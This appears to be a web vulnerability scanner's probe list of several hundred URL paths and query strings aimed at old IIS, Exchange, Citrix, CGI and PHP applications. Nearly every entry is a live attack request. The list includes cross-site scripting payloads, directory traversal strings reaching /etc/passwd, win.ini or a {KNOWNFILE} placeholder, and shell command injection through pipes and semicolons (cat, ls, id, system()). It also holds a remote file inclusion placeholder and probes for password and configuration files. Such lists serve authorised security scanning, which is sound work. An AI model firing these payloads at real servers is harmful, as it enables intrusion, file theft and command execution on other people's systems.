/.printer
/%NETHOOD%/
/<script>alert('XSS')</script>.aspx
/AccessPlatform/
/AccessPlatform/auth/
/AccessPlatform/auth/clientscripts/cookies.js 
/AccessPlatform/auth/clientscripts/login.js 
/Exadmin/
/ExchWeb/
/Exchange/
/Microsoft-Server-ActiveSync/
/OMA/
/OWA/
/Public/
/_layouts/alllibs.htm
/_layouts/settings.htm
/_layouts/userinfo.htm
/_vti_bin/
/_vti_bin/_vti_aut/fp30reg.dll
/_vti_pvt/
/_WEB_INF/
/a%5c.aspx
/adovbs.inc
/aspnet_files/
/certcontrol/
/certenroll/
/certsrv/
/citrix/
/citrix/AccessPlatform/auth/
/citrix/AccessPlatform/auth/clientscripts/
/AccessPlatform/auth/clientscripts/
/Citrix//AccessPlatform/auth/clientscripts/cookies.js 
/Citrix/AccessPlatform/auth/clientscripts/login.js 
/Citrix/PNAgent/config.xml
/exchange/root.asp
/forum.asp
/forum_arc.asp
/forum_professionnel.asp
/iisadmin/
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/iiasdmpwd/
/iishelp/
/iishelp/iis/misc/default.asp
/iissamples/
/imprimer.asp
/includes/adovbs.inc
/msadc/
/null.htw
/pbserver/pbserver.dll
/postinfo.html
/rubrique.asp
/scripts/
/scripts/fpcount.exe
/scripts/cgimail.exe
/scripts/tools/newdsn.exe
/scripts/tools/getdrvs.exe
/scripts/convert.bas
/cgi-bin/htmlscript
/scripts/counter.exe
/scripts/no-such-file.pl
/share/
/tsweb/
/~/<script>alert('XSS')</script>.asp
/~/<script>alert('XSS')</script>.aspx
/index.shtml
/x.htw
/x.ida
/x.idq
/cgi
/scripts/iisadmin/ism.dll?http/dir
/scripts/samples/search/webhits.exe
%2e%2e/abyss.conf
.access
.cobalt
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')>
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
.fhp
.htaccess
.htaccess.old
.htaccess.save
.htaccess~
.htpasswd
.nsconfig
.passwd
.www_acl
.wwwacl
/_vti_pvt/doctodep.btr
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}
AT-admin.cgi
AT-generate.cgi
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
AnyBoard.cgi
AnyForm
AnyForm2
Backup/add-passwd.cgi
C
Count.cgi
DC
DCFORM
File
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
FormMail.cgi?<script>alert(\
FormMail.pl
ImageFolio/admin/admin.cgi
LWGate
LWGate.cgi
Upload.pl
Vs
W
YaBB.pl?board=news&action=display&num=../../../../../../../../../..{KNOWNFILE}%00
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}
add_ftp.cgi
addbanner.cgi
adduser.cgi
admin.cgi
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}
admin.php
admin.php3
admin.pl
adminhot.cgi
adminwww.cgi
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
aglimpse
aglimpse.cgi
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
amadmin.pl
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}
ans.pl?p=../../../../../usr/bin/id|&blah
ans/ans.pl?p=../../../../../usr/bin/id|&blah
anyboard.cgi
archie
architext_query.cgi
architext_query.pl
ash
astrocam.cgi
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
auction/auction.cgi?action=
auctiondeluxe/auction.pl
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}
auth_data/auth_user_file.txt
awl/auctionweaver.pl
awstats.pl
awstats/awstats.pl
ax-admin.cgi
ax.cgi
axs.cgi
badmin.cgi
banner.cgi
bannereditor.cgi
bash
bb-hist?HI
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbs_forum.cgi
betsie/parserl.pl/<script>alert('XSS')</script>;
bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=
bizdb1-search.cgi
blog/
blog/mt-check.cgi
blog/mt-load.cgi
blog/mt.cfg
bnbform
bnbform.cgi
book.cgi?action=default&current=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10
boozt/admin/index.cgi?section=5&input=1
bsguest.cgi?email=x;ls
bslist.cgi?email=x;ls
build.cgi
bulk/bulk.cgi
c_download.cgi
cached_feed.cgi
cachemgr.cgi
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00
calendar
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
calendar.pl
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|
calendar/index.cgi
calendar_admin.pl?config=|cat%20{KNOWNFILE}|
calender_admin.pl
campas?%0acat%0a{KNOWNFILE}%0a
cart.pl
cart.pl?db='
cartmanager.cgi
cbmc/forums.cgi
ccbill-local.cgi?cmd=MENU
ccbill-local.pl?cmd=MENU
cgforum.cgi
cgi-lib.pl
cgicso?query=<script>alert('XSS')</script>
cgicso?query=AAA
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00
cgiwrap
cgiwrap/%3Cfont%20color=red%3E
cgiwrap/~@U
cgiwrap/~JUNK(5)
cgiwrap/~root
change-your-password.pl
classified.cgi
classifieds
classifieds.cgi
classifieds/classifieds.cgi
classifieds/index.cgi
clickcount.pl?view=test
clickresponder.pl
code.php
code.php3
com5..........................................................................................................................................................................................................................box
com5.java
com5.pl
commandit.cgi
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html
common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}
common/listrec.pl
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
compatible.cgi
count.cgi
counter-ord
counterbanner
counterbanner-ord
counterfiglet-ord
counterfiglet/nc/
cs
csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
csLive
csNews.cgi
csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
csPassword.cgi
csPassword/csPassword.cgi
csh
cstat.pl
cutecast/members/
cvsblame.cgi?file=<script>alert('XSS')</script>
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
cvslog.cgi?file=<script>alert('XSS')</script>
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script>
dasp/fm_shell.asp
data/fetch.php?page=
date
day5datacopier.cgi
day5datanotifier.cgi
db2www/library/document.d2w/show
db4web_c/dbdirname/{KNOWNFILE}
db_manager.cgi
dbman/db.cgi?db=no-db
dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00
dcshop/auth_data/auth_user_file.txt
dcshop/orders/orders.txt
dfire.cgi
diagnose.cgi
dig.cgi
directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00
displayTC.pl
dnewsweb
donothing
dose.pl?daily&somefile.txt&|ls|
download.cgi
dumpenv.pl
edit.pl
empower?DB=whateverwhatever
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
enter.cgi
environ.cgi
environ.pl
environ.pl?param1=<script>alert(document.cookie)</script>
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E
eshop.pl/seite=;cat%20eshop.pl|
ex-logger.pl
excite
excite;IF
ezadmin.cgi
ezboard.cgi
ezman.cgi
ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1
ezshopper2/loadpage.cgi
ezshopper3/loadpage.cgi
faqmanager.cgi?toc={KNOWNFILE}%00
faxsurvey?cat%20{KNOWNFILE}
filemail
filemail.pl
finger
finger.pl
flexform
flexform.cgi
fom.cgi?file=<script>alert('XSS')</script>
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
formmail
formmail.cgi
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
formmail.pl
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
fortune
ftp.pl
ftpsh
gH.cgi
gbadmin.cgi?action=change_adminpass
gbadmin.cgi?action=change_automail
gbadmin.cgi?action=colors
gbadmin.cgi?action=setup
gbook/gbook.cgi?_MAILTO=xx;ls
gbpass.pl
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1
getdoc.cgi
gettransbitmap
glimpse
gm-authors.cgi
gm-cplog.cgi
gm.cgi
guestbook.cgi
guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}|
guestbook.pl
guestbook/passwd
handler.cgi
hitview.cgi
horde/test.php
horde/test.php?mode=phpinfo
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00
htgrep?file=index.html&hdr={KNOWNFILE}
html2chtml.cgi
html2wml.cgi
htmlscript?../../../../../../../../../..{KNOWNFILE}
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
htsearch?-c/nonexistant
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
htsearch?exclude=%60{KNOWNFILE}%60
ibill.pm
icat
if/admin/nph-build.cgi
ikonboard/help.cgi?
imageFolio.cgi
imagefolio/admin/admin.cgi
imagemap
include/new-visitor.inc.php
index.js0x70
index.pl
info2www
info2www '(../../../../../../../bin/mail root <{KNOWNFILE}>
infosrch.cgi
ion-p?page=../../../../..{KNOWNFILE}
jailshell
jj
journal.cgi?folder=journal.cgi%00
ksh
lastlines.cgi?process
listrec.pl
loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE}
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
log-reader.cgi
log/
log/nether-log.pl?checkit
login.cgi
login.pl
login.pl?course_id=\
logit.cgi
logs.pl
logs/
logs/access_log
logs/error_log
lookwho.cgi
ls
lwgate
lwgate.cgi
magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../..{KNOWNFILE}
mail
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00
mailit.pl
maillist.cgi
maillist.pl
mailnews.cgi
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE}
majordomo.pl
man2html
mastergate/search.cgi?search=0&search_on=all
meta.pl
mgrqcgi
mini_logger.cgi
mmstdod.cgi
moin.cgi?test
mojo/mojo.cgi
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}
mrtg.cgi?cfg=blah
ms_proxy_auth_query/
mt-static/
mt-static/mt-check.cgi
mt-static/mt-load.cgi
mt-static/mt.cfg
mt/
mt/mt-check.cgi
mt/mt-load.cgi
mt/mt.cfg
multihtml.pl?multi={KNOWNFILE}%00html
musicqueue.cgi
myguestbook.cgi?action=view
namazu.cgi
nbmember.cgi?cmd=list_all_users
netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE}
netpad.cgi
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}
nimages.php
nlog-smb.cgi
nlog-smb.pl
non-existent.pl
noshell
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
nph-error.pl
nph-exploitscanget.cgi
nph-maillist.pl
nph-publish
nph-publish.cgi
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
nph-test-cgi
ntitar.pl
opendir.php?{KNOWNFILE}
orders/orders.txt
pagelog.cgi
pals-cgi?palsAction=restart&documentName={KNOWNFILE}
parse-file
pass
passwd
passwd.txt
password
pbcgi.cgi?name=Joe%Camel&email=%3C
perl
perl?-v
perlshop.cgi
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'
phf
phf.cgi?QALIA
phf?Qname=root%0Acat%20{KNOWNFILE}%20
photo/
photo/manage.cgi
photo/protected/manage.cgi
php-cgi
php.cgi?{KNOWNFILE}
plusmail
pollit/Poll_It_
pollssi.cgi
post-query
post_query
postcards.cgi
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}
printenv
printenv.tmp
probecontrol.cgi?command=enable&username=cancer&password=killer
processit.pl
profile.cgi
pu3.pl
publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10
query
query?mss=%2e%2e/config
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id=
quikstore.cfg
quizme.cgi
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}
ratlog.cgi
redirect
register.cgi
replicator/webpage.cgi/
responder.cgi
retrieve_password.pl
rksh
rmp_query
robadmin.cgi
robpoll.cgi
rpm_query
rsh
rtm.log
rwcgi60
rwcgi60/showenv
rwwwshell.pl
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1
sawmill?rfcf+%22
sbcgi/sitebuilder.cgi
scoadminreg.cgi
scripts/*%0a.pl
search.cgi
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
search.php?searchstring=<script>alert(document.cookie)</script>
search.pl
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script>
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
sendform.cgi
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}
session/adminlogin
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}
sh
shop.cgi?page=../../../../../../..{KNOWNFILE}
shop.pl/page=;cat%20shop.pl|
shop/auth_data/auth_user_file.txt
shop/orders/orders.txt
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}|
show.pl
showcheckins.cgi?person=<script>alert('XSS')</script>
showuser.cgi
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|
simplestguest.cgi
simplestmail.cgi
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|
sojourn.cgi?cat=../../../../../../../../../../etc/password%00
spin_client.cgi?aaaaaaaa
ss
sscd_suncourier.pl
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
stat.pl
stat/
stats-bin-p/reports/index.html
stats.pl
stats.prf
stats/
stats/statsbrowse.asp?filepath=c:\&Opt=3
stats_old/
statsconfig
statusconfig.pl
statview.pl
store.cgi?
store/agora.cgi?cart_id=<script>alert('XSS')</script>
store/agora.cgi?page=whatever33.html
store/index.cgi?page=../../../../../../../..{KNOWNFILE}
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00
survey
survey.cgi
sws/admin.html
sws/manager.pl
tablebuild.pl
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1
tcsh
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE}
test-cgi.tcl
test-cgi?/*
test-env
test.cgi
test/test.cgi
texis/junk
texis/phine
textcounter.pl
tidfinder.cgi
tigvote.cgi
title.cgi
tpgnrock
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}
troops.cgi
ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE}
ultraboard.cgi
ultraboard.pl
unlg1.1
unlg1.2
update.dpgs
upload.cgi
uptime
urlcount.cgi?%3CIMG%20
ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE}
utm/admin
utm/utm_stat
view-source
view-source?view-source
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
viewlogs.pl
viewsource?{KNOWNFILE}
viralator.cgi
virgil.cgi
vote.cgi
vpasswd.cgi
vq/demos/respond.pl?<script>alert('XSS')</script>
w3-msql
w3-sql
wais.pl
way-board.cgi?db={KNOWNFILE}%00
way-board/way-board.cgi?db={KNOWNFILE}%00
webais
webbbs.cgi
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20{KNOWNFILE}
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
webdist.cgi?distloc=;cat%20{KNOWNFILE}
webdriver
webgais
webif.cgi
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
webmap.cgi
webnews.pl
webplus?about
webplus?script=../../../../../../../../../..{KNOWNFILE}
websendmail
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}
webutil.pl
webutils.pl
webwho.pl
where.pl?sd=ls%20/etc
whois.cgi?action=load&whois=%3Bid
whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}
whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}
windmail
wrap
wrap.cgi
ws_ftp.ini
www-sql
wwwadmin.pl
wwwboard.cgi.cgi
wwwboard.pl
wwwstats.pl
wwwthreads/3tvars.pm
wwwthreads/w3tvars.pm
wwwwais
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00
zsh